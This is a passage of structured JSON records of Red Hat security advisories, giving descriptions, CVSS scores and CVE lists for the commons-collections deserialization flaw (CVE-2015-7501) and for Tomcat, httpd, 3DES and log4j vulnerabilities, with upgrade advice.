"integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2183", "CVE-2017-12615", "CVE-2017-12617", "CVE-2017-9788", "CVE-2017-9798"], "modified": "2018-06-06T22:42:48", "id": "RHSA-2017:3113", "href": "https://access.redhat.com/errata/RHSA-2017:3113", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:52:11", "description": "The Jakarta/Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing 
objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n\"org.apache.commons.collections.enableUnsafeSerialization\" to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-30T00:00:00", "type": "redhat", "title": "(RHSA-2015:2521) Important: jakarta-commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2015-7501"], "modified": "2018-06-06T16:24:27", "id": "RHSA-2015:2521", "href": "https://access.redhat.com/errata/RHSA-2015:2521", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Fuse Service Works 6.0.0 as provided from the\nRed Hat Customer Portal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-25T20:37:31", "type": "redhat", "title": "(RHSA-2015:2517) Critical: Red Hat Fuse Service Works 6.0.0 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:24:41", "id": "RHSA-2015:2517", "href": "https://access.redhat.com/errata/RHSA-2015:2517", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "JBoss Operations Network provides an integrated solution for managing\nJBoss middleware, other network infrastructure, and applications built\non Red Hat Enterprise Application Platform (EAP). The Apache Commons\nCollections library provides new interfaces, implementations, and\nutilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of JBoss Operations Network 3.1.2 as provided from the Red Hat\nCustomer Portal are advised to apply this update. 
This patch supersedes\nthe 3.2.1 Hotfix 10.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-01-14T18:31:06", "type": "redhat", "title": "(RHSA-2016:0040) Critical: Red Hat JBoss Operations Network 3.1.2 Hotfix 11 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:24:41", "id": "RHSA-2016:0040", "href": "https://access.redhat.com/errata/RHSA-2016:0040", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. 
(CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of JBoss Operations Network 3.3.4 as provided from the Red Hat\nCustomer Portal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-30T16:04:46", "type": "redhat", "title": "(RHSA-2015:2524) Critical: Red Hat JBoss Operations Network 3.3.4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:23:29", "id": "RHSA-2015:2524", "href": "https://access.redhat.com/errata/RHSA-2015:2524", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "The Jakarta/Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. 
A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n\"org.apache.commons.collections.enableUnsafeSerialization\" to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-21T00:00:00", "type": "redhat", "title": "(RHSA-2015:2671) Important: jakarta-commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2017-09-08T08:07:29", 
"id": "RHSA-2015:2671", "href": "https://access.redhat.com/errata/RHSA-2015:2671", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.4 on Red Hat\nEnterprise Linux 5, 6, and 7 are advised to upgrade to these updated\npackages. The JBoss server process must be restarted for the update to\ntake effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-20T00:00:00", "type": "redhat", "title": "(RHSA-2015:2500) Critical: Red Hat JBoss Enterprise Application Platform 6.4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2018-06-06T22:39:08", "id": "RHSA-2015:2500", "href": "https://access.redhat.com/errata/RHSA-2015:2500", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-29T10:41:39", "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nThis release provides an update to httpd, OpenSSL and Tomcat 6/7 for Red Hat JBoss Web Server 2. The updates are documented in the Release Notes document linked to in the References.\n\nThis release of Red Hat JBoss Web Server 2.1.2 Service Pack 2 serves as an update for Red Hat JBoss Web Server 2, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nUsers of Red Hat JBoss Web Server 2 should upgrade to these updated packages, which resolve several security issues.\n\nSecurity Fix(es):\n\n* It was discovered that the httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server. (CVE-2017-9788)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. 
(CVE-2017-12615)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12617)\n\n* A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank OpenVPN for reporting CVE-2016-2183 and Hanno B\u00f6ck for reporting CVE-2017-9798. Upstream acknowledges Karthikeyan Bhargavan (Inria) and Ga\u00ebtan Leurent (Inria) as the original reporters of CVE-2016-2183.\n\nBug Fix(es):\n\n* Corruption in nodestatsmem in multiple core dumps but in different functions of each core dump. 
(BZ#1338640)\n\n* mod_cluster segfaults in process_info() due to wrongly generated assembler instruction movslq (BZ#1448709)\n\n* CRL checking of very large CRLs fails with OpenSSL 1.0.2 (BZ#1493075)\n\n* The jboss-ews-application-servers zip README contains incomplete description of fixed CVEs (BZ#1497953)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.2}, "published": "2017-11-02T19:03:45", "type": "redhat", "title": "(RHSA-2017:3114) Important: Red Hat JBoss Web Server security and bug fix update", "bulletinFamily": "unix", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2183", "CVE-2017-12615", "CVE-2017-12617", "CVE-2017-9788", "CVE-2017-9798"], "modified": "2017-11-02T19:04:09", "id": "RHSA-2017:3114", "href": "https://access.redhat.com/errata/RHSA-2017:3114", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Red Hat JBoss Enterprise Application Platform is a platform for Java\napplications based on JBoss Application Server.\n\nIt was found that the Apache 
commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 5.2, 5.1.2, and\n4.3.10 are advised to upgrade to these updated packages. The JBoss server\nprocess must be restarted for the update to take effect.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-24T18:01:11", "type": "redhat", "title": "(RHSA-2015:2514) Critical: Red Hat JBoss Enterprise Application Platform security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2017-12-18T21:00:47", "id": "RHSA-2015:2514", "href": "https://access.redhat.com/errata/RHSA-2015:2514", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Red Hat 
JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.1, 6.2, 6.3,\nand 6.4 are advised to upgrade to these updated packages.\n\nThe JBoss server process must be restarted for the update to take effect.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-20T18:21:01", "type": "redhat", "title": "(RHSA-2015:2501) Critical: Red Hat JBoss Enterprise Application Platform security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:23:07", "id": "RHSA-2015:2501", "href": 
"https://access.redhat.com/errata/RHSA-2015:2501", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss BPM Suite 6.1.0 as provided from the Red Hat\nCustomer Portal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-08T16:09:43", "type": "redhat", "title": "(RHSA-2015:2579) Critical: Red Hat JBoss BPM Suite 6.1.0 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2015-7501"], "modified": "2019-02-20T12:24:41", "id": "RHSA-2015:2579", "href": "https://access.redhat.com/errata/RHSA-2015:2579", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-29T10:41:39", "description": "Log4j is a tool to help the programmer output log statements to a variety of output targets.\n\nSecurity Fix(es):\n\n* It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application. (CVE-2017-5645)", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2017-06-08T07:23:59", "type": "redhat", "title": "(RHSA-2017:1417) Important: rh-java-common-log4j security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5645"], "modified": "2018-06-12T21:28:16", "id": "RHSA-2017:1417", "href": "https://access.redhat.com/errata/RHSA-2017:1417", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:52:11", "description": 
"The Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n\"org.apache.commons.collections.enableUnsafeSerialization\" to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-30T04:45:33", "type": "redhat", "title": "(RHSA-2015:2522) Important: apache-commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2018-04-11T23:32:50", "id": "RHSA-2015:2522", "href": "https://access.redhat.com/errata/RHSA-2015:2522", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Data Virtualization 6.0.0, 6.1.0 and 6.2.0 as\nprovided from the Red Hat Customer Portal are advised to apply this\nsecurity update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-01T19:05:01", "type": "redhat", "title": "(RHSA-2015:2534) Critical: Red Hat JBoss Data Virtualization 6.0.0, 6.1.0, and 6.2.0 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:25:07", "id": "RHSA-2015:2534", "href": "https://access.redhat.com/errata/RHSA-2015:2534", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T22:41:49", "description": "The Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nSecurity Fix(es):\n\n* apache-commons-collections: InvokerTransformer code execution during deserialisation (CVE-2015-7501)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 